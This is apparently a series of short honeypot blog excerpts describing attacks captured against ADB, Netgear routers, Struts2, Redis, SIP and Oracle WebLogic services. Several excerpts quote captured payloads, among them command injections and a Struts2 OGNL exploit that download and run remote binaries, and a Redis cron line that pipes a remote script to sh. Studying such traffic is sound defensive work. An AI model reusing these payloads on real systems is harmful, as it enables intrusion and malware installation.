Researching network security

ADB Shell Attacks

On 10 July some new reports of fresh attacks against TCP 5555 came out. These attacks died out quickly as the download server died out. Telekom Security reported the abuse to the cloud service provider, temporarily halting infections. Now, it’s back! New download site, new download site, same attack. 434e584e000000010010000007000000 CNXN............ 32020000bcb1a7b1686f73743a3a004f 50454e5802000000000000f200000017 PENX............ 4a0000b0afbab17368656c6c3a3e2f73>/s 64636172642f446f776e6c6f61642f66 dcard/Download/f 202626206364202f7364636172642f44 && cd /sdcard/D 6f776e6c6f61642f3b203e2f6465762f ownload/; >/dev/ 66202626206364202f6465762f3b203e f && cd /dev/; > 2f646174612f6c6f63616c2f746d702f /data/local/tmp/ 66202626206364202f646174612f6c6f f && cd /data/lo 63616c2f746d702f3b2062757379626f cal/tmp/; busybo 78207767657420687474703a2f2f3138 x wget hxxp://18 352e36322e3138392e3134392f616462 5.

Exploitation of an Old Netgear Bug, Popular Again

Just a ton of what Glastopf reports as remote file inclusion attacks happened overnight, all of one similar type. Almost exactly 700 exploitation attempts using the vulnerability exploited here. Requests that would redirect a Netgear device back to one of 3 different download servers came from 37 unique IP addresses, suggesting a good amount of success exploiting this old vulnerability. /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp://;sh+mips&curpath=/&currentsetting.htm=1 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp://;sh+gang&curpath=/&currentsetting.htm=1 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp://;sh+netgear&curpath=/&currentsetting.htm=1 None of those download points are returning files at this time, unfortunately.

Disinvited by User Agent Retry - Windows

Finally, a chance to grab the Windows binaries that eluded me in my previous attempts during Disinvited By User Agent. I had the same attack probing my server this morning attempting to download and execute a Windows script, but this time I determined the correct user agent for the .Net WebClient class - it’s blank. The class, by default, doesn’t send any headers… curl -A “” hxxp:// -o checking.ps1 $W = New-Object System.

Attacks Spreading Cryptocoin Miners

This morning showed similar behavior to “attacks spreading cryptocoin miners”, but with new URL names and domains, choosing slightly less-obvious domains. Today the attack came from The download domain is, which at least doesn’t contain the term “zero-day” this time. This is a TOR proxy, enabling connections to TOR “dark-web” sites from the regular web. It then downloads files from will give some file information just based on the URL…

Attack Targeting struts2-rest-showcase

I see some interesting exploitation over port 80 to struts2-rest-showcase/orders.xhtml: Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c del C:/Windows/temp/searsvc.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/Windows/temp/searsvc.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/Windows/temp/searsvc.vbs&echo Post.Open "GET","hxxp://",0 >>C:/Windows/temp/searsvc.vbs&echo Post.Send() >>C:/Windows/temp/searsvc.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/Windows/temp/searsvc.vbs&echo aGet.Mode = 3 >>C:/Windows/temp/searsvc.vbs&echo aGet.Type = 1 >>C:/Windows/temp/searsvc.vbs&echo aGet.Open() >>C:/Windows/temp/searsvc.vbs&echo aGet.Write(Post.responseBody) >>C:/Windows/temp/searsvc.vbs&echo aGet.SaveToFile "C:/Windows/temp/esentur.exe",2 >>C:/Windows/temp/searsvc.vbs&echo wscript.sleep 10000>>C:/Windows/temp/searsvc.vbs&echo Shell.Run ("C:/Windows/temp/esentur.exe")>>C:/Windows/temp/searsvc.vbs&C:/Windows/temp/searsvc.vbs').(#iswin=(@java.lang.System@getProperty('').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())} It looks like this is abusing some mishandling of a content type, to write a vbs script that downloads hxxp://a46.

Notes about SIP Connections

Something that requires more study for me: SIP connections. SIP is a portion of the Voice over IP (VOIP) protocol. Most are from a scanner called sipvicious, but after the obvious sipvicious connections behind there are a number of interesting ones remaining. They seem to be probes of SIP capabilities at a remote address, which is similar to traffic at every other port. There are some more interesting requests though - I saw one the other day requesting a connection to a specific 10.

Strange POST Requests...

Strange POST requests are directed at Glastopf… Several IP addresses have sent requests to random looking URLs ending in .php, URLs that are unlikely to exist anywhere unless someone specifically places them. They contain POST data like: ip=\\my_ip\\&port=8080&uuid=8cd96698-3207-49bb-a815-e0fb979c4a16 ip=\\my_ip\\&port=8080&uuid=c0aac97a-371f-4864-aaf1-c4afacbdbccf These are directed towards host, with a variety of useragent strings, including: BlackBerry9000/ Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.

Disinvited from a URL by User-Agent

I have to check this thing every day or I miss something. It’s not every day that I see something new - most days are the same things I’ve already seen and new copies of malware that’s basically the same as the old. This morning, however, I witnessed a tactic I had wondered if anyone considered employing in the past, but hadn’t actually observed evidence of. I had traffic showing an attacker attempting to exploit CVE-2017-10271, dropping software from hxxp://107.

Attack Movement

It’s strange how attacks seem to move around on a weekly/monthly basis. Up until recently I saw a number of attacks against GPON, and today I don’t see a single one. There is some probability in this - I occupy only a small amount of IP space, so with a given number of attackers throwing a given number of attacks per second, some portion of the IP space less than 100% will be hit.

Attacks Spreading Cryptocoin Miners

This morning on TCP 6379 I received an offer my computer, fortunately, refused. 2a310d0a24370d0a434f4d4d414e440d *1..$7..COMMAND. 0a2a340d0a24360d0a636f6e6669670d .*4..$6..config. 0a24330d0a7365740d0a2431300d0a64 .$3..set..$10..d 6266696c656e616d650d0a24390d0a62 bfilename..$9..b 61636b75702e64620d0a2a310d0a2434 ackup.db..*1..$4 0d0a736176650d0a2a310d0a24380d0a*1..$8.. 666c757368616c6c0d0a2a330d0a2433 flushall..*3..$3 0d0a7365740d0a24370d0a74726f6a61 ..set..$7..troja 6e310d0a2436340d0a0a2a2f31202a20 n1..$64...*/1 * 2a202a202a206375726c202d6673534c * * * curl -fsSL 20687474703a2f2f6368726f6d652e7a http://chrome.z 6572306461792e72753a353035302f6d 727831207c2073680a0d0a rx1 | sh... Forget everything you know! Trojan time. The download link provided a shell script, which used both yum and apt-get to install a variety of dependencies, add an authorized ssh key to root, drop external connections to port 6379 via iptables (Bold move!